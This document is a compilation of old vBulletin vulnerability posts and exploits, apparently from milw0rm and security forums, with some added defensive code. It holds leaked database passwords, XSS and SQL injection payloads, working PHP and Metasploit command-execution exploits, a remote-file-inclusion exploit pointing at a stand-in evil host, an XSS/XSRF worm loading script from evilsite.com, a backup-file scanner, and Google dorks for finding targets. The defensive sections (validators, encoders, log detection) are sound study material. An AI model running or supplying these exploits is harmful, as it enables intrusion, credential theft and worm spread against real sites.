Some may already know this, but I find it really interesting that a large and mighty forum software like vBulletin can make the mistake of leaving the MySQL password visible to anyone.
 
The issue was published this afternoon and vBulletin responded with a patch for it.
 
faq.php is only indirectly affected and serves more as the output point, since an error in the phrases is partly responsible.
 
Where is the hole?
 
Let's look at the /install/vbulletin-language.xml file and search for "database_ingo" - what do we find? Ah, interesting:
 
##################################################################################################
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>
##################################################################################################
 
How do I use this now?
We look for a forum affected by this vulnerability, click "Help" / "FAQ" at the top, enter "Database" (or "database") in "search terms" or "Search Word(s):",
and then see, aha, the first hit:
 
##################################################################################################
 
Datenbank-Name: XXXXXXXXX
 
Datenbank-Server: localhost
 
Datenbank-Port: 3306
 
Datenbank-Benutzername: root
 
Datenbank-Kennwort: my4moo
##################################################################################################
 
 
Or, in English, on another board:
 
##################################################################################################
Database Name: pro_aXXXXXXXXXg_com
 
Database Host: localhost
 
Database Port: 3306
 
Database Username: pro_aXXXXXXXXXg
 
Database Password: gitl0st
##################################################################################################
 
I don't think I need to dwell on what can be done with this.
 
How do I protect myself?
Apply the patch already posted on the official vBulletin site, or run this MySQL query:
 
##################################################################################################
DELETE FROM `vb_phrase` WHERE `varname`='database_ingo' 
 
 
##################################################################################################
##################################################################################################
##################################################################################################
 
#############################################################################
Our Website : http://www.datacoders.ir
 
Special Thanks to : ccC0d3rZzz &  all iranian datacoders members
 
#############################################################################
MaXe/vBulletin 4.0.8 PL1 XSS Filter Bypass within Profile Customization ( php)

Code:
# Exploit Title: vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile Customization
# Google Dork: "Powered by vBulletin Version 4.0.8" -"vBulletin.com is now powered by"
# Date: 20th November 2010
# Author: MaXe
# Software Link: Commercial software.
# Version: 4.0.8 PL1
# Screenshot: See attachment.
# Tested on: Windows and Linux (Server) + IE6 (Client).
 
 
vBulletin - XSS Filter Bypass within Profile Customization
 
 
Versions Affected: 4.0.8 PL1 (3.8.* is not vulnerable.)
 
Info:
Content publishing, search, security, and more - vBulletin has it all.
Whether it's available features, support, or ease-of-use, vBulletin offers
the most for your money. Learn more about what makes vBulletin the
choice for people who are serious about creating thriving online
communities.
 
External Links:
http://www.vbulletin.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
Profile Customization feature. If this feature is not enabled the vulnerability
does not exist and the installation of vBulletin is thereby secure.
 
Within the profile customization fields, it is possible to enter colour codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
 
With the previous patch for vBulletin 4.0.8 PL1, most attacks were disabled,
however it is possible to bypass this filter and inject data which is then
executed effectively against, though not limited to, Internet Explorer 6.
 
Proof of Concept:
url(vbscript:msgbox("X/SS"))
 
 
-:: Solution ::-
Update vBulletin to version: 4.0.8 PL2
 
 
Disclosure Information:
- Vulnerability found and researched: 18th November 2010
- Disclosed to vendor (Internet Brands): 18th November
- Patch from Vendor available: 19th November
- Disclosed at: InterN0T, Full Disclosure, Bugtraq and Exploit: 20th November
 
 
References:
http://forum.intern0t.net/intern0t-advisories/3398-vbulletin-4-0-8-pl1-cross-site-scripting-filter-bypass-within-profile-customization.html
http://forum.intern0t.net/intern0t-advisories/3349-vbulletin-4-0-8-persistent-cross-site-scripting-via-profile-customization.html
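The two MaXe advisories (4.0.8 and the 4.0.8 PL1 filter bypass) both come down to the url() value in a profile style being passed through with too little sanitisation, so that a script tag, a second CSS declaration, or a javascript:/vbscript: scheme survives. The following is an added example in Python, not vBulletin's filter, of the allow-list validator a forum should apply to that value: anything that can close the url() token or start a new declaration is refused, and only http(s) URLs or site-relative paths are accepted. The four payloads from the advisories are included as constructed inputs together with two benign values; the function name is made up for this example.

```python
import re
from urllib.parse import urlparse

# Anything that could close the url() token, start a new declaration or
# smuggle markup: parens, quotes, angle brackets, ';', braces, backslash, whitespace.
_BREAKOUT = re.compile(r"[()\"'<>;{}\\\s]")
_ALLOWED_SCHEMES = ("http", "https")


def safe_css_url(value):
    """Validate one user-supplied url() argument for a profile style sheet.
    Returns the normalised 'url(...)' token, or None when the value is refused.
    Allow-list only: http(s) absolute URLs or site-relative paths."""
    v = value.strip()
    m = re.fullmatch(r"url\((.*)\)", v, re.S)   # accept either 'url(x)' or bare 'x'
    if m:
        v = m.group(1).strip().strip("'\"")
    if any(ord(ch) < 0x20 or ord(ch) == 0x7f for ch in v):   # 'java\tscript:' tricks
        return None
    if _BREAKOUT.search(v):
        return None
    scheme = urlparse(v).scheme.lower()
    if scheme:
        if scheme not in _ALLOWED_SCHEMES:      # javascript:, vbscript:, data: ...
            return None
    elif not v.startswith("/") or v.startswith("//"):   # relative path only, no protocol-relative
        return None
    return "url(%s)" % v


# The advisories' payloads plus two benign values, as constructed inputs.
SAMPLES = [
    'url(</script><img src="x:x" onerror="alert(1)" />)',
    'url(/);background:url(javascript:document.write(1337))',
    "url(/);width:expression(alert('x'))",
    'url(vbscript:msgbox("X/SS"))',
    'url(http://example.test/bg.png)',
    '/images/bg.png',
]


def check_samples():
    """Map each sample to the validator's verdict (None means refused)."""
    return {s: safe_css_url(s) for s in SAMPLES}


if __name__ == "__main__":
    for sample, verdict in check_samples().items():
        print("%-60s -> %s" % (sample, verdict))
```

The point of refusing rather than stripping is that every one of the PL1 bypasses is a new way to get a character past a blacklist; with an allow-list there is nothing to bypass, and the three IE-specific payloads fall out without the validator knowing anything about IE.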
AL3NDALEEB/vBulletin <= 3.0.4 "forumdisplay.php" Code Execution ( php)

PHP code:
<?php
/**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be a visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must have at least
# one user shown in the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
#
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
#
**************************************************************/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if (isset($argv[3])) {
    $url     = $argv[1];
    $forumid = intval($argv[2]);
    $command = $argv[3];
}
else {
    echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
    echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
    echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
    echo "<forumid> forum id\n";
    echo "<command> command to execute on server (ex: 'ls -la')\n";
    echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
    echo "ex :\n";
    echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";
    exit;
}

$proxy = isset($argv[4]) ? $argv[4] : '';

// GLOBALS[]=1 defeats the unset($GLOBALS["$_arrykey"]) cleanup in init.php; the
// injected $comma closes the template string and runs the command in backticks,
// bracketed by _START_/_END_ markers so its output can be cut out of the page
$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';

$ch = curl_init();
if ($proxy) {
    curl_setopt($ch, CURLOPT_PROXY, $proxy);
}
curl_setopt($ch, CURLOPT_URL, $url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
curl_close($ch);
$res = substr($res, strpos($res, '_START_') + 7);
$res = substr($res, 0, strpos($res, '_END_'));
echo $res;

?>
// milw0rm.com [2005-02-15]
d3v1l/vBulletin Radio and TV Player Add-On HTML Injection Vulnerability ( php)

Code:
vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability 
 
About:- 
 
Radio and TV Add-on will add a radio and TV library to your forum.
 
Features:- 
 
- Users can add / delete / edit own stations
 
For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2 
 
Note:-  
  
- To exploit this bug you need to be registered! After you are registered you can add a new radio station,
  where the station name can be "><script>alert(String.fromCharCode(88,83,83))</script>
  and the URL "><script>alert(String.fromCharCode(88,83,83))</script>
  
 
Poc: XSS 
 
http://www.musicadigitale.net/forum/radioandtv.php?station=92 
  
Poc: Iframe 
  
http://www.musicadigitale.net/forum/radioandtv.php?station=93 
  
Poc: Redirect 
  
http://www.musicadigitale.net/forum/radioandtv.php?station=94
 
dorks:- inurl:radioandtv.php 
 
Bug found by d3v1l [Avram Marius]
  
Date: 14.06.2009 
 
# milw0rm.com [2009-06-15]
str0ke/vBulletin <= 3.0.6 (Template) Command Execution Exploit (metasploit) ( php)

Code:
##
#        Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
#    Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
#         Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#     http://metasploit.com/projects/Framework for more information.
##
 
package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
 
my $advanced = { };
 
my $info = {
        'Name'     => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
        'Version'  => '$Revision: 1.0 $',
        'Authors'  => [ 'str0ke' ],
        'Arch'     => [ ],
        'OS'       => [ ],
        'Priv'     => 0,
        'UserOpts' =>
          {
                'RHOST' => [1, 'ADDR', 'The target address'],
                'RPORT' => [1, 'PORT', 'The target port', 80],
                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
                'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
                'SSL'   => [0, 'BOOL', 'Use SSL'],
          },
 
        'Description' => Pex::Text::Freeform(qq{
                This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),
 
        'Refs' =>
          [
                ['MIL', '832'],
          ],
 
        'Payload' =>
          {
                'Space' => 512,
                'Keys'  => ['cmd', 'cmd_bash'],
          },
 
        'Keys' => ['vBulletin'],
  };
 
sub new {
        my $class = shift;
        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
        return($self);
}
 
sub Exploit {
        my $self = shift;
        my $target_host    = $self->GetVar('RHOST');
        my $target_port    = $self->GetVar('RPORT');
        my $vhost          = $self->GetVar('VHOST') || $target_host;
        my $path           = $self->GetVar('RPATH');
        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;
 
        # Encode the command as a set of chr() function calls
        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
 
        # Create the get request data
        my $data = "?do=page&template={\${passthru($byte)}}";
 
        my $req =
                "GET $path$data HTTP/1.1\r\n".
                "Host: $vhost:$target_port\r\n".
                "Content-Type: application/html\r\n".
                "Content-Length: ". length($data)."\r\n".
                "Connection: Close\r\n".
                "\r\n";
 
        my $s = Msf::Socket::Tcp->new(
                'PeerAddr'  => $target_host,
                'PeerPort'  => $target_port,
                'LocalPort' => $self->GetVar('CPORT'),
                'SSL'       => $self->GetVar('SSL'),
          );
 
        if ($s->IsError){
                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
                return;
        }
 
        $self->PrintLine("[*] Sending the malicious vBulletin Get request...");
 
        $s->Send($req);
 
        my $results = $s->Recv(-1, 20);
        $s->Close();
 
        return;
}
 
1;
 
# milw0rm.com [2005-08-03]
Cnaph/Secure Downloads v2.0.0r for vBulletin SQL Injection Vulnerability ( php)

Code:
[~] vBulletin (Mod Secure Downloads v2.0.0r) SQL Injection Vulnerability
 
[~] Mod : http://www.1src.com/freeware/download.php?id=1880
 
[~] Author : Cn4phux
 
[~] PoC :
 
  
 
[~] URL.com/fileinfo.php?id=[SQL]
 
 
[~] : 1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0
 
 
//Cn4phux.
 
# milw0rm.com [2008-12-08]
Hussin X/vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability ( php)

Code:
vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________
 
Author: Hussin X
 
Home :  http://www.IQ-TY.com
 
Mail : darkangel_G85@yahoo.com
___________________________________
 
## script name : ads_saed
 
## d0rk : inurl:"vb/bnnr.php"
 
## Example :
 
 
Go to url : http://server/vb/bnnr.php
 
Exploit in the "user name" input (blind injection):
 
user name = ' ORDER BY 15/*
 
user name = ' ORDER BY 16/*
 
Now view the page source: "Unknown column '16' in 'order clause'"
 
 
exploit :
 
user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*
 
 
 
# Solution : See here
 
http://www.traidnt.net/vb/showthread.php?t=1102593
 
or update new Product
 
 
 
End
 
IQ-SecuritY FoRuM
Mx/vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit ( php)

JavaScript code:
/* -----------------------------
 * Author      = Mx
 * Title       = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software    = vBulletin
 * Addon       = Visitor Messages
 * Version     = 3.7.3
 * Attack      = XSS/XSRF

 - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 + with the visitor messages addon (a clone of a social network wall/comment area).
 - When posting XSS, the data is run through htmlentities(); before being displayed
 + to the general public/forum members. However, when posting a new message,
 - a new notification is sent to the commentee. The commenter posts a XSS vector such as
 + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 - under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
 + and I have included an example worm that makes the user post a new thread with your own
 - specified subject and message.

 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
 * of the attack method.
 * ----------------------------- */
  
function getNewHttpObject() {
var 
objType false;
try { 
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(
e) {
try { 
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(
e) { objType = new XMLHttpRequest();
}
}
return 
objType;
}

function 
getAXAH(url){

var 
theHttpRequest getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAH();}; theHttpRequest.open("GET"url); theHttpRequest.send(false);

function 
processAXAH(){
if (
theHttpRequest.readyState == 4) {
if (
theHttpRequest.status == 200) {

var 
str theHttpRequest.responseText;
var 
secloc str.indexOf('var SECURITYTOKEN = "');
var 
sectok str.substring(21+secloc,secloc+51+21);

var 
posloc str.indexOf('posthash" value="');
var 
postok str.substring(17+posloc,posloc+32+17);

var 
subject 'subject text';
var 
message 'message text';
  
postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5''subject=' subject '&message=' message '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' sectok '&f=5&do=postthread&posthash=' postok 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');

}
}
}
}








function 
postAXAH(urlparams) {
var 
theHttpRequest getNewHttpObject();
                 
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);}; theHttpRequest.open("POST"url); theHttpRequest.setRequestHeader('Content-Type''application/x-www-form-urlencoded; charset=iso-8859-2'); theHttpRequest.send(params);

function 
processAXAHr(elementContainer){
if (
theHttpRequest.readyState == 4) {
if (
theHttpRequest.status == 200) {

}
}
}
}

  
getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5'); document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');
  
# milw0rm.com [2008-11-20]  
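The write-up above describes a second-order XSS: the message was encoded when shown on the profile wall but not when the same stored value was rendered in the usercp.php notification. The defensive point is that encoding belongs at every output sink, not at storage time. The following is an added example, not vBulletin's or Mx's code; the function names, the `notice` markup and the sample message are assumptions made for this illustration.

```php
<?php
// Added example (not vBulletin code): the same stored visitor message rendered through
// an unescaped sink, as the usercp.php notification did, and through a sink that
// encodes for the HTML-text context. Names and markup are assumptions.

/** Vulnerable sink: stored user content is interpolated straight into HTML. */
function render_notification_unsafe(string $from, string $message): string
{
    return "<div class=\"notice\">New visitor message from $from: $message</div>";
}

/** Encoder for the HTML-text and attribute contexts. ENT_QUOTES covers both quote
 *  characters, ENT_SUBSTITUTE keeps an invalid UTF-8 byte from blanking the output. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Hardened sink: every user-controlled value passes through h() at the point of output. */
function render_notification_safe(string $from, string $message): string
{
    return '<div class="notice">New visitor message from ' . h($from) . ': ' . h($message) . '</div>';
}

/** Regression check for a template: did a tag from the input survive into the output verbatim? */
function tag_from_input_survives(string $html, string $input): bool
{
    if (!preg_match_all('/<[a-z!\/][^>]*>/i', $input, $m)) {
        return false;                       // input carried no tags at all
    }
    foreach ($m[0] as $tag) {
        if (strpos($html, $tag) !== false) {
            return true;                    // tag reached the page unencoded
        }
    }
    return false;
}

// Constructed sample input: the vector quoted in the advisory above.
$vector = '<script src="http://evilsite.com/nbd.js"></script>';

foreach (['unsafe' => 'render_notification_unsafe', 'safe' => 'render_notification_safe'] as $label => $fn) {
    $html = $fn('mallory', $vector);
    printf("%-6s tag survives: %s\n       %s\n", $label,
           tag_from_input_survives($html, $vector) ? 'yes' : 'no', $html);
}
```

The encoder is applied once per sink, so adding a second place that renders the same message (the notification, an e-mail preview, an RSS feed) means adding a second call, not relying on what happened at insert time. A `Content-Security-Policy` with `script-src 'self'` would additionally have stopped the remote `nbd.js` from loading even where a sink was missed, which is the kind of layered control that makes a worm like the one above fail closed.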

ReZEN/vBulletin ImpEx <= 1.74 Remote Command Execution Exploit

PHP code:
<?php /*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd  = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

// Input form: target URL (turl), URL of the hosted include file (hurl) and the command to run.
$form = "<form method=\"post\" action=\"".$_SERVER['PHP_SELF']."\">"
      ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
      ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
      ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
      ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
      ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{
    echo $form;
}else{
    // Write the file that the target will include; its output is fenced by markers.
    $file = fopen("test.txt", "w+");
    fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); system(\"echo ++END++\"); ?>");
    fclose($file);

    // Request the target with systempath pointing at the hosted file.
    $file = fopen($turl.$hurl, "r");
    if (!$file) {
        echo "<p>Unable to get output.\n";
        exit;
    }

    echo $form;

    $line = '';
    while (!feof($file)) {
        $line .= fgets($file, 1024)."<br>";
    }
    // Cut the command output out from between the two markers.
    $tpos1  = strpos($line, "++BEGIN++");
    $tpos2  = strpos($line, "++END++");
    $tpos1  = $tpos1 + strlen("++BEGIN++");
    $tpos2  = $tpos2 - $tpos1;
    $output = substr($line, $tpos1, $tpos2);
    echo $output;
}
?>
# milw0rm.com [2006-04-13]
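The ImpEx issue above is the classic remote file inclusion shape: a request parameter (`systempath`) is prepended to an include path, so whoever controls the parameter chooses which file, local or remote, gets executed. The following is an added example, not ImpEx or vBulletin code, showing that include pattern next to a loader that pins the base directory, allow-lists the file name and checks the resolved path. The function names, the `ImpExFunction.php` file name and the temporary directory are assumptions made for this example.

```php
<?php
// Added example (not ImpEx/vBulletin code). Names are assumptions for illustration.

/** Vulnerable shape: the caller decides where the helper is loaded from. With
 *  allow_url_include enabled this will fetch and run code from a remote URL; with it
 *  disabled, traversal to any local file still works. */
function load_helper_unsafe(string $systempath): void
{
    include $systempath . 'ImpExFunction.php';
}

/** Hardened loader: fixed base directory, a plain-file-name allow-list, and a realpath()
 *  containment check so that neither URLs, traversal nor symlinks can leave $base.
 *  Returns the validated absolute path; the caller then does `include $path;`. */
function resolve_helper(string $base, string $name): string
{
    if (!preg_match('/^[A-Za-z0-9_]+\.php$/', $name)) {
        throw new InvalidArgumentException("helper name not allowed: $name");
    }
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $target === false
        || strncmp($target, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        throw new RuntimeException("helper resolves outside the base directory: $name");
    }
    return $target;
}

// Constructed fixture: a scratch directory with one legitimate helper and one symlink
// that points outside it (the symlink step is skipped where symlinks are unavailable).
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'impex_demo_' . getmypid();
mkdir($base);
file_put_contents($base . '/ImpExFunction.php', "<?php\n// stub helper created by the example\n");
$haveLink = @symlink(__FILE__, $base . '/Escape.php');

$attempts = [
    'ImpExFunction.php',                  // legitimate helper
    'http://www.pwn3d.com/evil.txt?',     // the hurl shape from the exploit above
    '../../etc/passwd',                   // traversal
    'Escape.php',                         // passes the name check, fails containment
];
foreach ($attempts as $name) {
    try {
        printf("%-32s -> allowed: %s\n", $name, resolve_helper($base, $name));
    } catch (Exception $e) {
        printf("%-32s -> rejected: %s\n", $name, $e->getMessage());
    }
}

// Clean up the fixture.
if ($haveLink) { unlink($base . '/Escape.php'); }
unlink($base . '/ImpExFunction.php');
rmdir($base);
```

The two checks are deliberately independent: the name pattern stops URLs and traversal before any filesystem call, and the `realpath()` comparison catches anything that still resolves elsewhere, such as the symlink. Setting `allow_url_include=0` (and, unless a feature needs it, `allow_url_fopen=0`) in php.ini removes the remote variant for every script on the host, and is worth doing regardless of application-level fixes.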
str0ke/vBulletin <= 3.0.8 Accessible Database Backup Searcher (update 3) ( php)

Code:
/*
 * Needed to pentest a few vBulletin forums so I wrote this junk real quick.
 * Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html
 * Good paths: /forum/ / /forum/archive/ /forum/cpadmin/
 * Update 1: Code error fixes. /str0ke (str0ke@milw0rm.com)
 * Update 2: Fixed datestring-version for international boards by hals1 (h4ls4bschn31d3r@gmx.net)
 * Update 3: French vBulletin boards added by Tyn0r (tyn0r@atxteam.net)
 * /str0ke
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

#define SERVER_PORT 80

/* Backup file name date layouts, tried in this order for each day back. */
static const char *datefmts[] = {
    "%m-%d-%Y",
    "%Y-%d-%m",
    "%d-%m-%Y",
    "%m.%d.%Y", /* hals1 */
    "%Y.%d.%m", /* hals1 */
    "%d.%m.%Y", /* hals1 */
    "%d%m%Y"    /* Tyn0r */
};
#define NFMTS ((int)(sizeof(datefmts) / sizeof(datefmts[0])))

/* Date b days ago in layout d; prints which file name is being tried. */
char *getdate_fmt(int d, int b){
    static char datestring[40];
    time_t ttt;
    int minustime;
    minustime = 86400 * b;
    ttt = time(NULL) - minustime;
    strftime(datestring, sizeof(datestring), datefmts[d], localtime(&ttt));
    printf("Searching: forumbackup-%s.sql\n", datestring);
    return(datestring);
}

int main(int argc, char *argv[]) {
    char buffer[1000], host[255] = "", path[255] = "";
    int c;
    int sd, rc, i = 0, d = 0;   /* i = days back, d = date layout index */
    struct sockaddr_in localAddr, servAddr;
    struct hostent *h;

    char *http =
        "Accept: */*\r\n"
        "Accept-Language: en-us,en;q=0.5\r\n"
        "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
        "User-Agent: we want your backups - milw0rm\r\n"
        "Connection: close\r\n\r\n";

    if (argc != 5) {
        printf("vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.com\n");
        printf("usage: %s -h hostname/ip -p /path/ \n", argv[0]);
        exit(0);
    }

    while ((c = getopt(argc, argv, "h:p:")) != EOF)
        switch (c)
        {
            case 'h':
                strncpy(host, optarg, sizeof(host) - 1);
                break;
            case 'p':
                strncpy(path, optarg, sizeof(path) - 1);
                break;
        }

    h = gethostbyname(host);
    if (h == NULL) {
        printf("Unknown Host '%s'\n", host);
        exit(1);
    }

    printf("Trying To Connect To [%s]\n", host);
    while (1) {
        servAddr.sin_family = h->h_addrtype;
        memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
        servAddr.sin_port = htons(SERVER_PORT);
        sd = socket(AF_INET, SOCK_STREAM, 0);
        if (sd < 0) {
            perror("Can Not Open The Socket\n");
            exit(1);
        }

        localAddr.sin_family = AF_INET;
        localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
        localAddr.sin_port = htons(0);

        rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));
        if (rc < 0) {
            printf("%d: cannot bind port TCP %u\n", sd, SERVER_PORT);
            perror("error ");
            exit(1);
        }

        rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
        if (rc < 0) {
            perror("cannot connect\n");
            exit(1);
        }

        /* One HEAD request per candidate file name; a new connection each time. */
        memset(buffer, 0, sizeof(buffer));
        snprintf(buffer, sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",
                 path, getdate_fmt(d, i), host, http);
        rc = send(sd, buffer, strlen(buffer), 0);
        memset(buffer, 0, sizeof(buffer));

        while (1)
        {
            rc = recv(sd, buffer, sizeof(buffer) - 1, 0);
            if (rc <= 0) break;                 /* closed or error: no verdict, move on */
            if (strstr(buffer, "404")) break;
            if (strstr(buffer, "200 OK"))
            {
                printf("Database backup found: %s%sforumbackup-%s.sql\n", host, path, getdate_fmt(d, i));
                exit(0);
            }
            memset(buffer, 0, sizeof(buffer));
        }
        close(sd);

        /* Next layout; after the last layout, go one more day back. */
        d = (d + 1) % NFMTS;
        if (d == 0) {
            i++;
        }
    }
}

// milw0rm.com [2005-08-31]
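The scanner above is loud: it issues one HEAD request per day per date layout for `forumbackup-<date>.sql`, from a fixed User-Agent, until it gets a 200. That makes it easy to spot in web server logs, and any 200 in the series is the real finding (a backup sitting in the web root). The following is an added example, not str0ke's or vBulletin's code, that reads Apache combined-format log lines and summarises the probing per client address; the log lines are constructed for the example, and the function and constant names are assumptions.

```php
<?php
// Added example (not str0ke's code): flag backup-name probing in access logs.
// Log lines below are constructed for this example.

// Matches every date layout the scanner tries: 2- or 4-digit groups joined by '-', '.' or nothing.
const BACKUP_NAME = '/\/forumbackup-\d{2,4}[-.]?\d{2}[-.]?\d{2,4}\.sql(?:\?|$)/';
// Apache "combined" log format: ip ident user [time] "method path proto" status bytes "referer" "ua"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "[^"]*" "([^"]*)"$/';

/** Parse one combined-format line; null when the line does not fit the format. */
function parse_log_line(string $line): ?array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4],
            'status' => (int)$m[5], 'ua' => $m[7]];
}

/** Per client IP: number of backup-name probes, which of them got a 200, and whether the
 *  scanner's own User-Agent string was seen. Only requests for backup names are counted. */
function find_backup_probes(array $lines): array
{
    $out = [];
    foreach ($lines as $line) {
        $r = parse_log_line($line);
        if ($r === null || !preg_match(BACKUP_NAME, $r['path'])) {
            continue;
        }
        $ip = $r['ip'];
        $out[$ip] ??= ['probes' => 0, 'hits' => [], 'scanner_ua' => false];
        $out[$ip]['probes']++;
        if ($r['status'] === 200) {
            $out[$ip]['hits'][] = $r['path'];          // a served backup: the real incident
        }
        if (stripos($r['ua'], 'we want your backups') !== false) {
            $out[$ip]['scanner_ua'] = true;
        }
    }
    return $out;
}

// Constructed sample: three probes from one address (one of which finds a file), plus normal traffic.
$sample = [
    '203.0.113.7 - - [31/Aug/2005:10:00:01 +0000] "HEAD /forum/forumbackup-08-30-2005.sql HTTP/1.1" 404 0 "-" "we want your backups - milw0rm"',
    '203.0.113.7 - - [31/Aug/2005:10:00:02 +0000] "HEAD /forum/forumbackup-2005-30-08.sql HTTP/1.1" 404 0 "-" "we want your backups - milw0rm"',
    '203.0.113.7 - - [31/Aug/2005:10:00:03 +0000] "HEAD /forum/forumbackup-30082005.sql HTTP/1.1" 200 0 "-" "we want your backups - milw0rm"',
    '198.51.100.4 - - [31/Aug/2005:10:00:04 +0000] "GET /forum/showthread.php?t=1 HTTP/1.1" 200 8124 "-" "Mozilla/5.0"',
];

foreach (find_backup_probes($sample) as $ip => $info) {
    printf("%-14s probes=%d scanner_ua=%s served=%s\n", $ip, $info['probes'],
           $info['scanner_ua'] ? 'yes' : 'no',
           $info['hits'] ? implode(' ', $info['hits']) : '(none)');
}
```

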